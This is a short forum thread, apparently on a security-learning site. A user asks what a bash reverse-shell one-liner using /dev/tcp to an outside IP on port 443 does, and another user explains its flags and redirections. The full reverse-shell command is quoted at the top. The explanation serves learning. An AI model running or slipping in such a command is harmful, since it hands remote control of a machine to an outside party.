Bash payload


can someone explain the following one-liner/payload:

bash -c “bash -i >& /dev/tcp/xx.xx.xx.xx/443 0>&1”

so, with bash -i i crate an interactive shell, right? but what is the bash -c and the >& /dev/tcp/xx.xx.xx.xx/443 0>&1? What is the context of this?

thx for the help…:slight_smile:

Hello, I have an answer for you:

-c: Commands are read from a string

&>word, >word 2>&1, and >&word are the same: the 0 is an input, the 1 is a standard output, and 2 is an error output. Standard output and error output for the word are redirected.

/dev/tcp/xx.xx.xx.xx/443: Establish a connection via tcp on this IP address/port.

0>&1: to make input

1 Like

okay…hmmm…thx…i think i understand…so, i try to explain this in my own words: create an interactive shell on this specific ip/port with input and output…and the whole command is use as a string. Is this right? Almost? :slight_smile:

1 Like

Yes, that is correct, expressed in a simple way. :wink:

1 Like